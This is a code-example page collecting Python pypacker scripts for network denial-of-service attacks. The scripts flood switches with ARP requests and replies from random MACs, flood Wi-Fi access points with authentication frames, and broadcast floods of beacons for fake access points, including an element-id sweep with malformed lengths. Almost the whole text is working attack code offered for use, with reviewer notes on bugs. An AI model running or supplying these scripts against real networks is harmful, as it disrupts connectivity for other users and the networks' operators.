예제 #1
def arp_cb(pargs):
    """ARP DoS, eg for switches

    Builds one broadcast ARP request and one ARP reply addressed to
    ``pargs.mac_dst`` from the template fields in ``pargs``, then sends
    ``pargs.count`` request/reply pairs on ``pargs.iface_name``.  Every
    frame gets a fresh random source MAC (Ethernet ``src`` and ARP ``sha``
    set to the same value) and a fresh random sender IP.  Returns nothing.

    Args:
        pargs: argument object providing ``mac_src``, ``mac_dst``,
            ``ip_src``, ``ip_dst``, ``iface_name`` and ``count``.
    """
    #logger.debug("%s %s %s %s", pargs.mac_src, pargs.mac_dst, pargs.ip_src, pargs.ip_dst)
    # Broadcast request: Ethernet dst and ARP target hardware address are all-FF.
    pkt_arp_req = ethernet.Ethernet(dst=b"\xFF" * 6, src_s=pargs.mac_src, type=ethernet.ETH_TYPE_ARP) +\
     arp.ARP(sha_s=pargs.mac_src, spa_s=pargs.ip_src, tha=b"\xFF" * 6, tpa_s=pargs.ip_dst,
      op=arp.ARP_OP_REQUEST)
    # Unicast reply aimed at mac_dst/ip_dst.  The source fields given here are
    # only initial values; they are overwritten on every iteration below.
    pkt_arp_resp = ethernet.Ethernet(dst_s=pargs.mac_dst, src_s=pargs.mac_src, type=ethernet.ETH_TYPE_ARP) + \
     arp.ARP(sha_s=pargs.mac_src, spa_s=pargs.ip_src, tha_s=pargs.mac_dst, tpa_s=pargs.ip_dst,
      op=arp.ARP_OP_REPLY)

    psock = psocket.SocketHndl(iface_name=pargs.iface_name)

    # NOTE(review): the close() after the loop is skipped if send() raises;
    # a try/finally would make the cleanup unconditional.
    for cnt in range(pargs.count):
        # request from various sources
        mac = pypacker.get_rnd_mac()
        pkt_arp_req.src = mac
        pkt_arp_req.arp.sha = mac
        pkt_arp_req.arp.spa = pypacker.get_rnd_ipv4()
        psock.send(pkt_arp_req.bin())

        # response from various sources
        mac = pypacker.get_rnd_mac()
        pkt_arp_resp.src = mac
        pkt_arp_resp.arp.sha = mac
        pkt_arp_resp.arp.spa = pypacker.get_rnd_ipv4()
        psock.send(pkt_arp_resp.bin())
    psock.close()
예제 #2
def wifi_authdos_cb(pargs):
    """Authentication frames DoS.

    Sends ``pargs.count`` 802.11 management frames of subtype ``M_AUTH`` to
    ``pargs.mac_dst`` on the first channel listed in ``pargs.channels``,
    giving each frame a random source MAC.  A progress dot is printed every
    16 frames; ``socket.timeout`` on send is ignored.  Returns nothing.

    Args:
        pargs: argument object providing ``iface_name``, ``mac_dst``,
            ``channels`` (comma-separated string) and ``count``.
    """
    radiotap_ieee80211 = radiotap.Radiotap() + \
     ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_AUTH, to_ds=0, from_ds=0)
    # dst and bssid are both the target; src is randomised per frame below.
    auth = ieee80211.IEEE80211.Auth(dst_s=pargs.mac_dst, bssid_s=pargs.mac_dst)
    radiotap_ieee80211_auth = radiotap_ieee80211 + auth
    psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
                                    mode=psocket.SocketHndl.MODE_LAYER_2)

    # Only the first channel of the list is used.
    channel = int(pargs.channels.split(",")[0])
    # NOTE(review): the message says "deauth", but the frames built above are
    # authentication (M_AUTH) frames.
    logger.debug("sending %d deauth to %r on channel %d", pargs.count,
                 pargs.mac_dst, channel)
    # Same value as `channel`, recomputed.
    utils.switch_wlan_channel(pargs.iface_name,
                              int(pargs.channels.split(",")[0]))

    for cnt in range(pargs.count):
        if cnt & 15 == 0:
            print(".", end="")
            sys.stdout.flush()
        auth.src = pypacker.get_rnd_mac()

        try:
            psock_send.send(radiotap_ieee80211_auth.bin())
        except socket.timeout:
            # timeout on sending? that's ok
            pass
    print("")
    psock_send.close()
예제 #3
def send_auth(mac):
	"""Send authentications to ap having mac 'mac'

	Sends up to 1,000,000 frames built from a deep copy of the module-level
	``auth_req_orig`` template through the module-level ``psocket``, giving
	each frame a random source MAC, and prints the send rate every 500
	frames.  ``socket.timeout`` on send is ignored.

	Args:
		mac: not referenced in the body; the destination is whatever
			``auth_req_orig`` already carries.
	"""
	auth_req = copy.deepcopy(auth_req_orig)
	start_time = time.time()

	for i in range(1000000):
		if i % 500 == 0:
			# NOTE(review): on the first iteration i == 0 and diff can be 0.0,
			# in which case the division below raises ZeroDivisionError.
			diff = time.time() - start_time
			print("%d pps" % (i / diff))
		auth_req[ieee80211.IEEE80211.Auth].src = pypacker.get_rnd_mac()

		try:
			psocket.send(auth_req.bin())
		except socket.timeout:
			# timeout on sending? that's ok
			pass
예제 #4
def send_beacon(_):
	"""Send beacons for a series of randomly generated fake APs.

	Works on a deep copy of the module-level ``beacon_orig`` template.  For
	i in 1..9999 it assigns a random source MAC/BSSID and a random 10-char
	alphanumeric SSID, resets the sequence number, then sends 100 copies,
	setting ``seq`` and ``ts`` to the inner loop index after each send.
	Every ``aps_per_channel`` iterations the channel counter advances
	through 1..12 (the actual channel switch is commented out).  Prints the
	send rate every 100 iterations; ``socket.timeout`` is ignored.

	Args:
		_: unused.
	"""
	beacon = copy.deepcopy(beacon_orig)
	start_time = time.time()
	aps_per_channel = 5
	current_channel = 1

	for i in range(1, 10000):
		if i % 100 == 0:
			diff = time.time() - start_time
			print("%d pps" % (i / diff))
		if i % aps_per_channel == 0:
			# Wrap 1..12; 13 maps to 0 and is bumped back to 1.
			current_channel += 1
			current_channel %= 13
			if current_channel == 0:
				current_channel = 1
			# utils.switch_wlan_channel(wlan_monitor_if, current_channel)

		_beacon = beacon[ieee80211.IEEE80211.Beacon]
		mac = pypacker.get_rnd_mac()
		_beacon.src = mac
		_beacon.bssid = mac
		# set new ssid
		_beacon.params[0].body_bytes = bytes("".join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10)), "ascii")
		# print(_beacon.params[0].body_bytes)
		# seq is reset per AP; ts is not, so the first copy keeps the previous ts.
		_beacon.seq = 0

		# print(_beacon)

		try:
			for x in range(100):
				# send multiple beacons for every ap
				psocket.send(beacon.bin())
				_beacon.seq = x
				# _beacon.ts = x << (8*7)
				_beacon.ts = x
		except socket.timeout:
			# timeout on sending? that's ok
			pass
예제 #5
import time

# name of monitor interface to use
wlan_monitor_if	= "prism0"
# MAC address of access point
ap_mac		= "00:11:22:33:44:55"
# Handle on the monitor interface.  It is only closed in the error path of
# the loop below; the sends themselves go through `psocket.send`.
mon_sock	= psocket.SocketHndl(wlan_monitor_if)

# Prism header + 802.11 management header (subtype auth, to_ds=1) + MGMT
# frame addressed to the AP + authentication body with sequence 1.
# NOTE(review): `prism` is called directly here but used as `prism.Prism`
# inside the loop; both names come from outside this listing.
auth_req	= prism(len=24) +\
		ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_AUTH, to_ds=1, from_ds=0) +\
		ieee80211.IEEE80211.MGMTFrame(dst_s=ap_mac, bssid_s=ap_mac) +\
		ieee80211.IEEE80211.Auth(auth_seq=1)

print("starting DOS attack on AP %s" % ap_mac)

for i in range(10000):
	#drvinfo = radiotap.Radiotap(raw_bytes)
	# `raw_bytes` is not defined in this listing, and drvinfo is never read.
	drvinfo = prism.Prism(raw_bytes)
	# NOTE(review): start_time is reset on every iteration, so `diff` below
	# only measures the time since this line, not 100 packets' worth.
	start_time = time.time()

	if i % 100 == 0:
		diff = time.time()-start_time
		print("%d pps" % (100/diff) )

	try:
		# Fresh random transmitter address per frame.
		auth_req[ieee80211.IEEE80211.MGMTFrame].src = pypacker.get_rnd_mac()
		psocket.send(auth_req.bin())
	except Exception as e:
		# Any send error closes mon_sock, but the loop keeps running.
		mon_sock.close()
		print(e)
예제 #6
def wifi_ap_ie_cb(pargs):
    """Create fake APs using various IEs.

    Sends beacons on every channel in ``pargs.channels`` (or on all channels
    reported by ``utils.get_available_wlan_channels``).  Per channel the id
    of the beacon's last information element is swept over 0..255 and, for
    each id, ``PACKETS_PER_CHANNEL`` beacons with a random BSSID/source MAC
    and a random ESSID are sent.  The whole sweep repeats ``pargs.count``
    times or until ``pargs.is_running`` is cleared.  On ``OSError`` the
    per-packet sleep is multiplied by 10 and the loop pauses one second;
    ``socket.timeout`` is ignored.  Returns nothing.

    Args:
        pargs: argument object providing ``iface_name``, ``channels``
            (comma-separated string or None), ``count`` and ``is_running``.
    """
    if pargs.channels is not None:
        channels = [int(channel) for channel in pargs.channels.split(",")]
    else:
        channels = utils.get_available_wlan_channels(pargs.iface_name)

    # Beacon template.  params[0] is the SSID element (id 0) and params[2]
    # the DS parameter set (id 3, channel); ids 1, 5 and 0x2A are the 802.11
    # supported-rates, TIM and ERP elements.  The last element declares
    # len=255 with a 16-byte body and has its id swept in the loop below.
    beacon_orig = radiotap.Radiotap() + \
        ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \
        ieee80211.IEEE80211.Beacon(
        dst=b"\xFF\xFF\xFF\xFF\xFF\xFF",
        src=b"\xFF\xFF\xFF\xFF\xFF\xFF",
        params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10),
         ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"),
         ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"),
         ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"),
         ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00"),
         ieee80211.IEEE80211.IE(id=0x00, len=255, body_bytes=b"\x00"*16),
        ]
        )
    beacon = copy.deepcopy(beacon_orig)
    _beacon = beacon[ieee80211.IEEE80211.Beacon]
    mac = pypacker.get_rnd_mac()
    essid = "012"
    _beacon.src = mac
    _beacon.bssid = mac
    _beacon.params[0].body_bytes = bytes(essid, "ascii")
    _beacon.params[0].len = len(essid)
    # pack_B comes from outside this block; presumably a one-byte struct pack.
    _beacon.params[2].body_bytes = pack_B(channels[0])
    _beacon.seq = 0
    # adaptive sleeptime due to full buffer on fast sending
    # (only ever grows; it is never reset within this function)
    sleeptime = 0.000001
    # Cooperative stop flag, checked once per outer round; presumably cleared
    # from elsewhere (e.g. a signal handler) — not visible here.
    pargs.is_running = True

    logger.info("faking APs on the following channels %r", channels)
    psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
                                    mode=psocket.SocketHndl.MODE_LAYER_2)

    ie_cnt = 0
    pkt_cnt = 0
    PACKETS_PER_CHANNEL = 3

    for _ in range(pargs.count):
        if not pargs.is_running:
            break

        for channel in channels:
            # Always true: pkt_cnt only ever grows by 256, so this prints
            # once per channel.
            if pkt_cnt % (256) == 0:
                print("%d packets sent, ch: %d      \r" % (pkt_cnt, channel),
                      end="")
                sys.stdout.flush()

            _beacon.params[2].body_bytes = pack_B(channel)
            utils.switch_wlan_channel(pargs.iface_name, channel)
            #logger.info("AP on channel %d: %s", channel, _beacon.params[0].body_bytes)
            # Counted up front, before the 256 ids below are actually sent.
            pkt_cnt += 256

            try:
                # Sweep the last element's id over every possible value.
                for ie_id in range(256):
                    _beacon.params[5].id = ie_id
                    mac = pypacker.get_rnd_mac()
                    _beacon.src = mac
                    _beacon.bssid = mac
                    # get_random_essid comes from outside this block.
                    _beacon.params[0].body_bytes = get_random_essid()
                    _beacon.params[0].len = len(_beacon.params[0].body_bytes)

                    for _ in range(PACKETS_PER_CHANNEL):
                        _beacon.seq = ie_id
                        # _beacon.ts = x << (8*7)
                        _beacon.ts = ie_id * 20
                        # time.sleep(0.01)
                        psock_send.send(beacon.bin())
                        time.sleep(sleeptime)
            except socket.timeout:
                # timeout on sending? that's ok
                pass
            except OSError:
                sleeptime *= 10
                print()
                logger.warning(
                    "buffer full, new sleeptime: %03.6fs, waiting...",
                    sleeptime)
                time.sleep(1)

            # ie_cnt is updated here but never read.
            ie_cnt = (ie_cnt + 1) & 0xFF
    psock_send.close()
예제 #7
def wifi_ap_cb(pargs):
    """Create a massive amount of fake APs.

    Runs ``pargs.count`` iterations, each sending ``PACKETS_PER_CHANNEL``
    beacons, all on the first channel of ``pargs.channels`` (or of the
    channels reported by ``utils.get_available_wlan_channels``; the rest of
    the list is parsed but not used).  Every iteration derives a new
    source MAC/BSSID and ESSID whose last three bytes come from the
    iteration counter.  Stops early when ``pargs.is_running`` is cleared.
    On ``OSError`` the backoff value is multiplied by 10 and the loop
    pauses one second; ``socket.timeout`` is ignored.  Returns nothing.

    Args:
        pargs: argument object providing ``iface_name``, ``channels``
            (comma-separated string or None), ``count`` and ``is_running``.
    """
    if pargs.channels is not None:
        channels = [int(channel) for channel in pargs.channels.split(",")]
    else:
        channels = utils.get_available_wlan_channels(pargs.iface_name)

    # Beacon template.  params[0] is the SSID element (id 0) and params[2]
    # the DS parameter set (id 3, channel); ids 1, 5 and 0x2A are the 802.11
    # supported-rates, TIM and ERP elements.
    beacon_orig = radiotap.Radiotap() + \
        ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \
        ieee80211.IEEE80211.Beacon(
        dst=b"\xFF\xFF\xFF\xFF\xFF\xFF",
        src=b"\xFF\xFF\xFF\xFF\xFF\xFF",
        params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10),
         ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"),
         ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"),
         ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"),
         ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00")])
    beacon = copy.deepcopy(beacon_orig)
    _beacon = beacon[ieee80211.IEEE80211.Beacon]
    mac = pypacker.get_rnd_mac()
    essid = "FreeHotspot"
    _beacon.src = mac
    _beacon.bssid = mac
    _beacon.params[0].body_bytes = bytes(essid, "ascii")
    _beacon.params[0].len = len(essid)
    # pack_B comes from outside this block; presumably a one-byte struct pack.
    _beacon.params[2].body_bytes = pack_B(channels[0])
    _beacon.seq = 0
    # Largest value the 16-bit beacon interval field can hold.
    _beacon.interval = 0xFFFF
    # adaptive sleeptime due to full buffer on fast sending
    # (grown and logged on OSError below; the sleep that would use it is
    # commented out)
    sleeptime = 0.000001
    # Both switches are constant here; the corresponding branches always run.
    rand_mac = True
    rand_essid = True
    # Cooperative stop flag, checked once per iteration; presumably cleared
    # from elsewhere — not visible here.
    pargs.is_running = True

    logger.info("faking APs on the following channels %r", channels)
    psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
                                    mode=psocket.SocketHndl.MODE_LAYER_2)
    cnt = 0
    rounds = 0
    PACKETS_PER_CHANNEL = 3
    starttime = time.time()
    # Only the first channel is ever selected; no switching inside the loop.
    _beacon.params[2].body_bytes = pack_B(channels[0])
    utils.switch_wlan_channel(pargs.iface_name, channels[0])

    for _ in range(pargs.count):
        if not pargs.is_running:
            break

        # Every 16th iteration: progress line, and once 60 s have passed
        # since starttime the round counter is bumped and cnt wraps to 0.
        # starttime is never reset, so after 60 s this happens at every
        # 16th iteration.
        if cnt & 0xF == 0:
            print("%d packets sent\r" % (cnt * PACKETS_PER_CHANNEL), end="")
            sys.stdout.flush()

            if time.time() - starttime > 60:
                rounds += 1
                cnt = 0

        # Three trailing bytes derived from cnt via unpack_I (defined outside
        # this block); spliced into the MAC and ESSID below.
        cnt_bts = unpack_I(cnt)[0][-3:]
        cnt += 1

        if rand_mac:
            mac = pypacker.get_rnd_mac()[:3] + cnt_bts
            _beacon.src = mac
            _beacon.bssid = mac

        if rand_essid:
            # get_random_essid comes from outside this block.
            _beacon.params[0].body_bytes = get_random_essid()[:-3] + cnt_bts
            _beacon.params[0].len = len(_beacon.params[0].body_bytes)

        try:
            # Per-round base values; each send below advances them.
            _beacon.seq = 1000 + rounds * PACKETS_PER_CHANNEL
            _beacon.ts = 2000 + rounds * 0x100 * PACKETS_PER_CHANNEL

            for cnt_ap in range(PACKETS_PER_CHANNEL):
                # send multiple beacons for every ap
                psock_send.send(beacon.bin())
                _beacon.seq += 1
                _beacon.ts += 0x100
                #time.sleep(sleeptime)
        except socket.timeout:
            # timeout on sending? that's ok
            pass
        except OSError:
            sleeptime *= 10
            print()
            logger.warning("buffer full, new sleeptime: %03.6fs, waiting...",
                           sleeptime)
            time.sleep(1)

    psock_send.close()